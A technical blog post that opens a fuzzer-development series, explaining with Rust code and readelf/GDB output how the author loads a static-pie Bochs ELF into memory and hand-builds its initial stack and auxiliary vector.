Fuzzer Development 1: The Soul of a New Machine

2023-11-04T00:00:00+00:00

Introduction && Credit to Gamozolabs

For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.

One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though, in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. This lobotomy approach is reducing the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.

Another approach, is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.

And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer ontop of it, I revisited gamozolabs (Brandon Falk’s) stream paper review he did on the Nyx paper. It’s a great stream, the Nyx authors were present in Twitch chat and so there were some good back and forths and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! During the stream, Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.

This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:

it is relatively simple in its design,
it allows for almost endless introspection utilities to be added,
it lends itself well to iterative development cycles,
it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),
it can fuzz the Linux Kernel,
it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
it is pretty unique in its design compared to open source fuzzing tools that exist,
it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,
it can be made to be portable, ie, there is nothing stopping us for running this fuzzer on Windows instead of just Linux,
it will allow me to do a lot of learning and low-level computing research and learning.

So all things considered, this seemed like the ideal project to implement on the blog and so I reached out to Gamozo to make sure he’d be ok with it as I didn’t want to be seen as clout chasing off of his ideas and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content and we’re off to developing the fuzzer.

Also huge shoutout to @is_eqv and @ms_s3c at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.

Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.

Misc

Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.

I’ve decided to name the project “Lucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.

Bochs

What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less-complex emulation tool similar to QEMU but with way less use-cases and way less performant. Instead of taking QEMU’s approach of “let’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let’s emulate an entire x86 system 100% in software without worrying about performance for the most part. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect much code changes or rapid development, the last release was over 2 years ago.

Fuzzer Architecture

This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.

Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system, prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID or something similar. I actually haven’t given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.

Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.

So in general, this is how our fuzzing setup should look:

In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.

Loading an ELF in Memory

So in order to make this portion of loading Bochs in memory in the most simplistic way possible, I’ve chosen to compile Bochs as a -static-pie ELF. Now this means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie test program and make sure we can do that correctly.

In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.

#include 
#include 

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters > 5) { return 0; }
    }
}

Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.

So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment. Likely because of the relocations that need to be performed during the aforementioned _start routine.

dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test

Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got

So what portions of the this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.

Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.

ELF Headers

I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:

// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub shoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
    pub shentsize: u16,
    pub shnum: u16,
    pub shrstrndx: u16,
}

We really care about a few of these struct members. For one, we definitely need to know the entry, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.

A single program header, ie, a single entry in the array, can be synthesized into the following data structure:

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64, 
}

These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD, as these segments are the ones we have to account for when loading the ELF image. Take our readelf output for example:

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000

We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:

Flags describes the memory permissions this segment should have, we have 3 distinct memory protection schemes READ, READ | EXECUTE, and READ | WRITE
Offset describes how far into the physical file contents we can expect to find this segment
PhysAddr we don’t much care about
VirtAddr the virtual address this segment should be loaded at, you can tell that the first segment value for this is 0x0000000000000000 which means that it has no expectations about where it’s to be loaded.
MemSiz how large the segment should be in virtual memory
Align how to align the segments in virtual memory

For our very simplistic use-case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.

Loading the ELF

Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.

The first thing we need to do, is calculate the size of the virtual memory that we need in order to load the ELF based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after the segments that aren’t page aligned, so to do this, I used the following logic:

// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
    "Unable to read binary data from Bochs binary"))?;

// Parse ELF 
let elf = parse_elf(&data)?;

// We need to iterate through all of the loadable program headers and 
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
    if ph.is_load() {
        let end_addr = (ph.vaddr + ph.memsz) as usize;
        if mapping_size < end_addr { mapping_size = end_addr; }
    }
}

// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
    mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}

We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “end_addr” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap to hold the loadable ELF segments. We mmap a contiguous range of memory here:

// Call `mmap` to map memory into our process to hold all of the loadable 
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
    // We don't want to specify a fixed address
    let addr = LOAD_TARGET as *mut libc::c_void;

    // Length is straight forward
    let length = size as libc::size_t;

    // Set the protections for now to writable
    let prot = libc::PROT_WRITE;

    // Set the flags, this is anonymous memory
    let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

    // We don't have a file to map, so this is -1
    let fd = -1 as libc::c_int;

    // We don't specify an offset 
    let offset = 0 as libc::off_t;

    // Call `mmap` and make sure it succeeds
    let result = unsafe {
        libc::mmap(
            addr,
            length,
            prot,
            flags,
            fd,
            offset
        )
    };

    if result == libc::MAP_FAILED {
        return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
    }

    Ok(result as usize)
}

So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy from the file data in memory, to the carved out memory we just created. You can see that logic here:

let mut load_segments = Vec::new();
    for ph in elf.program_headers.iter() {
        if ph.is_load() {
            load_segments.push((
                ph.flags,               // segment.0
                ph.vaddr    as usize,   // segment.1
                ph.memsz    as usize,   // segment.2
                ph.offset   as usize,   // segment.3
                ph.filesz   as usize,   // segment.4
            ));
        }
    }

After the segment metadata has been extracted, we can copy the contents over as well as call mprotect on the segment in memory so that its permissions perfectly match the Flags segment metadata we discussed earlier. That logic is here:

// Iterate through the loadable segments and change their perms and then 
// copy the data over
for segment in load_segments.iter() {
    // Copy the binary data over, the destination is where in our process
    // memory we're copying the binary data to. The source is where we copy
    // from, this is going to be an offset into the binary data in the file,
    // len is going to be how much binary data is in the file, that's filesz 
    // This is going to be unsafe no matter what
    let len = segment.4;
    let dst = (addr + segment.1) as *mut u8;
    let src = (elf.data[segment.3..segment.3 + len]).as_ptr();

    unsafe {
        std::ptr::copy_nonoverlapping(src, dst, len);
    }

    // Calculate the `mprotect` address by adding the mmap address plus the
    // virtual address offset, we also mask off the last 0x1000 bytes so 
    // that we are always page-aligned as required by `mprotect`
    let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
        as *mut libc::c_void;

    // Get the length
    let mprotect_len = segment.2 as libc::size_t;

    // Get the protection
    let mut mprotect_prot = 0 as libc::c_int;
    if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
    if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
    if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }

    // Call `mprotect` to change the mapping perms
    let result = unsafe {
        libc::mprotect(
            mprotect_addr,
            mprotect_len,
            mprotect_prot
        )
    };

    if result < 0 {
        return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
    }
}

After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new “process” which I learned was a huge pain.

Setting Up a Stack for Bochs

I spent a lot of time on this and there actually might still be bugs! This was the hardest part I’d say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.

Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:

position            content                     size (bytes) + comment
  ------------------------------------------------------------------------
  stack pointer ->  [ argc = number of args ]     4
                    [ argv[0] (pointer) ]         4   (program name)
                    [ argv[1] (pointer) ]         4
                    [ argv[..] (pointer) ]        4 * x
                    [ argv[n - 1] (pointer) ]     4
                    [ argv[n] (pointer) ]         4   (= NULL)

                    [ envp[0] (pointer) ]         4
                    [ envp[1] (pointer) ]         4
                    [ envp[..] (pointer) ]        4
                    [ envp[term] (pointer) ]      4   (= NULL)

                    [ auxv[0] (Elf32_auxv_t) ]    8
                    [ auxv[1] (Elf32_auxv_t) ]    8
                    [ auxv[..] (Elf32_auxv_t) ]   8
                    [ auxv[term] (Elf32_auxv_t) ] 8   (= AT_NULL vector)

                    [ padding ]                   0 - 16

                    [ argument ASCIIZ strings ]   >= 0
                    [ environment ASCIIZ str. ]   >= 0

  (0xbffffffc)      [ end marker ]                4   (= NULL)

  (0xc0000000)      < bottom of stack >           0   (virtual)
  ------------------------------------------------------------------------

When we pass arguments to a process on the command line like ls / -laht, the Linux OS has to load the ls ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well / and -laht. The way that the OS passes these arguments to the process is on the stack via the argument vector or argv for short, which is an array of string pointers. The number of arguments is represented by the argument count or argc. The first member of argv is usually the name of the executable that was passed on the command line, so in our example it would be ls. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is argc, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL terminated at the end.

After that, we have a similar data structure with the envp array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment, the environment variables are usually in the form “KEY=VALUE”, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8". For our purposes, we can ignore the environment variables. This vector is also NULL terminated.

Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the test program, we can actually dump the auxiliary information by using info aux under GDB.

gef➤  info aux
 AT_SYSINFO_EHDR      System-supplied DSO's ELF header 0x7ffff7f2e000
 ???                                                 0xe30
 AT_HWCAP             Machine-dependent CPU capability hints 0x1f8bfbff
  AT_PAGESZ            System page size               4096
 AT_CLKTCK            Frequency of times()           100
  AT_PHDR              Program headers for program    0x7ffff7f30040
  AT_PHENT             Size of program header entry   56
  AT_PHNUM             Number of program headers      12
  AT_BASE              Base address of interpreter    0x0
  AT_FLAGS             Flags                          0x0
  AT_ENTRY             Entry point of program         0x7ffff7f39f50
 AT_UID               Real user ID                   1000
 AT_EUID              Effective user ID              1000
 AT_GID               Real group ID                  1000
 AT_EGID              Effective group ID             1000
 AT_SECURE            Boolean, was exec setuid-like? 0
 AT_RANDOM            Address of 16 random bytes     0x7fffffffe3b9
 AT_HWCAP2            Extension of AT_HWCAP          0x2
 AT_EXECFN            File name of executable        0x7fffffffefe2 "/home/dude/lucid/test"
 AT_PLATFORM          String identifying platform    0x7fffffffe3c9 "x86_64"
  AT_NULL              End of vector                  0x0

The keys are on the left the values are on the right. For instance, on the stack we can expect the value 0x5 for AT_PHNUM, which describes the number of Program Headers, to be accompanied by 12 as the value. We can dump the stack and see this in action as well.

gef➤  x/400gx $rsp
0x7fffffffe0b0:	0x0000000000000001	0x00007fffffffe3d6
0x7fffffffe0c0:	0x0000000000000000	0x00007fffffffe3ec
0x7fffffffe0d0:	0x00007fffffffe3fc	0x00007fffffffe44e
0x7fffffffe0e0:	0x00007fffffffe461	0x00007fffffffe475
0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007

You can see the towards the end of the data at 0x7fffffffe2d8 we can see the key 0x5, and at 0x7fffffffe2e0 we can see the value 0xc which is 12 in hex. We need some of these in order to load our ELF properly as the ELF _start routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, they might not all be necessary:

AT_ENTRY which holds the program entry point,
AT_PHDR which is a pointer to the program header data,
AT_PHNUM which is the number of program headers,
AT_RANDOM which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of 0x4141414141414141 and ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are crytographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.
AT_NULL which is used to terminate the auxiliary vector

So with those values all accounted for, we now know all of the data we need to construct the program’s stack.

Allocating the Stack

First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap the same way we did with the program segments. Right now I’m using a 1MB stack which seems to be large enough.

Constructing the Stack Data

In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.

So the first value we place onto the stack is the “end-marker” from the diagram which is just a 0u64 in Rust.

Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:

// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();

// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);

// Parse the argv entries for Bochs
let args = parse_bochs_args();

// Store the length of the strings including padding
let mut arg_lens = Vec::new();

// For each argument, push a string onto the stack and store its offset 
// location
for arg in args.iter() {
    let old_len = stack_data.len();
    push_string(&mut stack_data, arg.to_string());

    // Calculate arg length and store it
    let arg_len = stack_data.len() - old_len;
    arg_lens.push(arg_len);
}

Pushing strings is performed like this:

// Pushes a NULL terminated string onto the "stack" and pads the string with 
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
    // Convert the string to bytes and append it to the stack
    let mut bytes = string.as_bytes().to_vec();

    // Add a NULL terminator
    bytes.push(0x0);

    // We're adding bytes in reverse because we're adding to index 0 always,
    // we want to pad these strings so that they remain 8-byte aligned so that
    // the stack is easier to reason about imo
    if bytes.len() % U64_SIZE > 0 {
        let pad = U64_SIZE - (bytes.len() % U64_SIZE);
        for _ in 0..pad { bytes.push(0x0); }
    }

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

Then we add some padding and the auxiliary vector members:

// Add some padding
push_u64(&mut stack_data, 0u64);

// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);

// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate 
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);

// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);

// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);

// Add AT_RANDOM key which is 25, this is where the start routines will 
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);

Then, since we ignored the environment variables, we just push a NULL pointer onto the stack and also the NULL pointer terminating the argv vector:

// Since we skipped ennvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);

// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);

This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv pointers onto the stack. We calculate the length as follows:

// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();

// Add argv pointers
stack_length += args.len() * POINTER_SIZE;

// Add argc
stack_length += std::mem::size_of::<u64>();

Next, we start at the bottom of the stack and create a movable offset which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset represents how deep into the stack from the top we are. At first, the offset is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv string we pushed onto the stack. So the bottom of the stack looks something like this:

NULL
string_1
string_2
end-marker <--- offset

So armed with the arguments and their lengths that we recorded, we can adjust the offset each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:

// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accomdate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accomodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
    // First argument, account for end-marker
    if idx == 0 {
        curr_offset -= arg_len + U64_SIZE;
    }
    
    // Not the first argument, just account for the string length
    else {
        curr_offset -= arg_len;
    }
    
    // Calculate the absolute address
    let absolute_addr = (stack_addr + curr_offset) as u64;

    // Push the absolute address onto the stack
    push_u64(&mut stack_data, absolute_addr);
}

It’s pretty cool! And it seems to work? Finally we cap the stack off with argc and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.

